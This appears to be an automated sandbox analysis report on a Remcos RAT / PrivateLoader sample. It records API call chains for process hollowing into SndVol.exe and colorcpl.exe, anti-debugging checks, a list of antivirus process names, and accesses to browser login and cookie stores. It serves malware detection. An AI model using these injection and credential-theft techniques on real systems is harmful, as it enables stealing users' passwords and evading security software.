Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_00409253
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0041C291 FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	3_2_0041C291
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040C34D FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	3_2_0040C34D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_00409665
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0044E879 FindFirstFileExA,	3_2_0044E879
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	3_2_0040880C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040783C FindFirstFileW,FindNextFileW,	3_2_0040783C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00419AF5 FindFirstFileW,FindNextFileW,FindNextFileW,	3_2_00419AF5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040BB30 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	3_2_0040BB30
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0040BD37 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	3_2_0040BD37
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05358509 FindFirstFileW,FindNextFileW,	3_2_05358509
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0539F546 FindFirstFileExA,	3_2_0539F546
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053594D9 __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,	3_2_053594D9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535C7FD FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,	3_2_0535C7FD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536A7C2 FindFirstFileW,	3_2_0536A7C2
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535D01A FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,	3_2_0535D01A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535A332 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_0535A332
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05359F20 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,	3_2_05359F20
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0536CF5E FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,	3_2_0536CF5E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535CA04 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,	3_2_0535CA04
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C10F1 lstrlenW,lstrlenW,lstrcatW,lstrlenW,lstrlenW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,	3_2_1E6C10F1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C6580 FindFirstFileExA,	3_2_1E6C6580
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 4_2_0040AE51 FindFirstFileW,FindNextFileW,	4_2_0040AE51
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 7_2_00407EF8 FindFirstFileA,FindNextFileA,strlen,strlen,	7_2_00407EF8

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,

3_2_00407C97

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 4_2_00418981 memset,GetSystemInfo,

4_2_00418981

Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007B0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW x~%SystemRoot%\system32\mswsock.dllxxw
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007E1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW^>9
Source: HGTQP09643009.scr.exe, 00000000.00000002.2002800587.00000000007E1000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2019710060.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408677302.00000000034F9000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.0000000000745000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 00000009.00000002.2160077550.000000000072F000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008A2000.00000004.00000020.00020000.00000000.sdmp, Jsqwmpul.PIF, 0000000C.00000002.2251582423.00000000008CA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: bhv3259.tmp.4.dr	Binary or memory string: https://config.edge.skype.com/config/v1/Skype/1446_8.53.0.77?OSVer=10.0.19045.2006&ClientID=RHTiQUpXOaQeBtbq%2B7LgJauNdx5lF%2FQ%2FOy2qwXRNGjU%3D&Manufacturer=VMware%2C%20Inc.&Model=VMware20%2C1&Language=en&Locale=en-US

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	API call chain: ExitProcess graph end node	graph_0-24199
Source: C:\Windows\SysWOW64\SndVol.exe	API call chain: ExitProcess graph end node	graph_3-103566
Source: C:\Windows\SysWOW64\SndVol.exe	API call chain: ExitProcess graph end node

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

3_2_004349F9

Source: C:\Windows\SysWOW64\SndVol.exe

4_2_0040DD85

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_02917CA8 LoadLibraryW,GetProcAddress,NtWriteVirtualMemory,FreeLibrary,

0_2_02917CA8

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: 0_2_029473AD mov eax, dword ptr fs:[00000030h]	0_2_029473AD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004432B5 mov eax, dword ptr fs:[00000030h]	3_2_004432B5
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535114A mov eax, dword ptr fs:[00000030h]	3_2_0535114A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0535114A mov eax, dword ptr fs:[00000030h]	3_2_0535114A
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05393F82 mov eax, dword ptr fs:[00000030h]	3_2_05393F82
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C4AB4 mov eax, dword ptr fs:[00000030h]	3_2_1E6C4AB4

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00411CFE SetLastError,GetNativeSystemInfo,SetLastError,GetProcessHeap,HeapAlloc,SetLastError,

3_2_00411CFE

Source: C:\Windows\SysWOW64\SndVol.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_004349F9 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_004349F9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00434B47 SetUnhandledExceptionFilter,	3_2_00434B47
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0043BB22 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0043BB22
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_00434FDC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_00434FDC
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_0538C7EF IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_0538C7EF
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_053856C6 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_053856C6
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05385CA9 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_05385CA9
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_05385814 SetUnhandledExceptionFilter,	3_2_05385814
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C2B1C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	3_2_1E6C2B1C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C2639 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1E6C2639
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: 3_2_1E6C60E2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	3_2_1E6C60E2

HIPS / PFW / Operating System Protection Evasion

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Memory allocated: C:\Windows\SysWOW64\SndVol.exe base: 5350000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Memory allocated: C:\Windows\SysWOW64\colorcpl.exe base: 6F80000 protect: page execute and read and write

Contains functionality to inject code into remote processes

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_004180EF GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,

3_2_004180EF

Creates a thread in another existing process (thread injection)

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Thread created: C:\Windows\SysWOW64\SndVol.exe EIP: 5351638			Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Thread created: C:\Windows\SysWOW64\colorcpl.exe EIP: 6F81638

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 5350000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F80000 value starts with: 4D5A

Maps a DLL or memory area into another process

Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Section loaded: NULL target: C:\Windows\SysWOW64\SndVol.exe protection: execute and read and write	Jump to behavior

Writes to foreign memory regions

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Memory written: C:\Windows\SysWOW64\SndVol.exe base: 5350000			Jump to behavior
Source: C:\Users\Public\Libraries\Jsqwmpul.PIF	Memory written: C:\Windows\SysWOW64\colorcpl.exe base: 6F80000

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe

3_2_004120F7

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00419627 mouse_event,

3_2_00419627

Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\xkjscr"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\hfwldkaiv"	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Process created: C:\Windows\SysWOW64\SndVol.exe C:\Windows\SysWOW64\SndVol.exe /stext "C:\Users\user\AppData\Local\Temp\jhbdectkjqlx"	Jump to behavior

Source: SndVol.exe, 00000003.00000002.4408677302.00000000034F9000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerMO\
Source: SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerMO\59
Source: SndVol.exe, 00000003.00000002.4408617814.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000003.2299239501.00000000034BE000.00000004.00000020.00020000.00000000.sdmp, SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \|Program Manager\|
Source: SndVol.exe, 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Program ManagerWindowogs.dat}
Source: SndVol.exe, 00000003.00000002.4408561480.0000000003460000.00000004.00000020.00020000.00000000.sdmp, logs.dat.3.dr	Binary or memory string: [Program Manager]

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00434C52 cpuid

3_2_00434C52

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0292431E
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: CoInitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0291D5C8
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: GetModuleFileNameA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegOpenKeyExA,RegQueryValueExA,RegQueryValueExA,RegCloseKey,lstrcpyn,GetThreadLocale,GetLocaleInfoA,lstrlen,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,lstrcpyn,LoadLibraryExA,	0_2_02905A78
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: GetLocaleInfoA,	0_2_0290A788
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: GetLocaleInfoA,	0_2_0290A73C
Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe	Code function: CoInitialize,WinExec,WinExec,RtlMoveMemory,GetCurrentProcess,EnumSystemLocalesA,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,GetCurrentProcess,ExitProcess,	0_2_0291D5C8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_00452036
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_004520C3
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	3_2_00452313
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_00448404
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_0045243C
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	3_2_00452543
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_00452610
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	3_2_0040F8D1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	3_2_004488ED
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_00451CD8
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_00451F50
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_00451F9B
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	3_2_053995BA
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoA,	3_2_0536059E
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	3_2_053A3109
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_053990D1
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	3_2_053A3210
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	3_2_053A32DD
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_053A2D03
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	3_2_053A2D90
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_053A2C1D
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: EnumSystemLocalesW,	3_2_053A2C68
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: GetLocaleInfoW,	3_2_053A2FE0
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	3_2_053A29A5

Source: C:\Windows\SysWOW64\SndVol.exe

Queries volume information: C:\ VolumeInformation

Jump to behavior

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_02909184 GetLocalTime,

0_2_02909184

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_0041B60D GetComputerNameExW,GetUserNameW,

3_2_0041B60D

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: 3_2_00449190 _free,_free,_free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,_free,

3_2_00449190

Source: C:\Users\user\Desktop\HGTQP09643009.scr.exe

Code function: 0_2_0290B704 GetVersionExA,

0_2_0290B704

Source: C:\Windows\SysWOW64\SndVol.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: cmdagent.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: quhlpsvc.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgamsvr.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: TMBMSRV.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Vsserv.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgupsvc.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: avgemc.exe
Source: HGTQP09643009.scr.exe, 00000000.00000002.2018672596.0000000026542000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000003.1996427489.000000007EEA0000.00000004.00001000.00020000.00000000.sdmp, HGTQP09643009.scr.exe, 00000000.00000002.2031782228.000000007F290000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Stealing of Sensitive Information

Yara detected PrivateLoader

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected Remcos RAT

Source: Yara match	File source: 3.2.SndVol.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f818cd.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.53518cd.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.5350000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 3.2.SndVol.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.6f80000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 13.2.colorcpl.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000003.00000002.4419622044.000000001E42F000.00000004.00000010.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251885365.0000000006F80000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2251261824.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408277877.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000003.2246883380.0000000003129000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408997863.0000000005350000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000003.00000002.4408561480.0000000003483000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000D.00000002.2247045059.0000000000400000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: SndVol.exe PID: 6352, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: colorcpl.exe PID: 5900, type: MEMORYSTR
Source: Yara match	File source: C:\ProgramData\remcos\logs.dat, type: DROPPED

Contains functionality to steal Chrome passwords or cookies

Source: C:\Windows\SysWOW64\SndVol.exe

Code function: \AppData\Local\Google\Chrome\User Data\Default\Login Data

3_2_0040BA12

Contains functionality to steal Firefox passwords or cookies

Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \AppData\Roaming\Mozilla\Firefox\Profiles\		3_2_0040BB30
Source: C:\Windows\SysWOW64\SndVol.exe	Code function: \key3.db		3_2_0040BB30

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\SysWOW64\SndVol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\places.sqlite	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\key4.db	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini	Jump to behavior

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\IdentityCRL\Dynamic Salt	Jump to behavior
Source: C:\Windows\SysWOW64\SndVol.exe	Key opened: HKEY_CURRENT_USER\Software\Google\Google Talk\Accounts	Jump to behavior
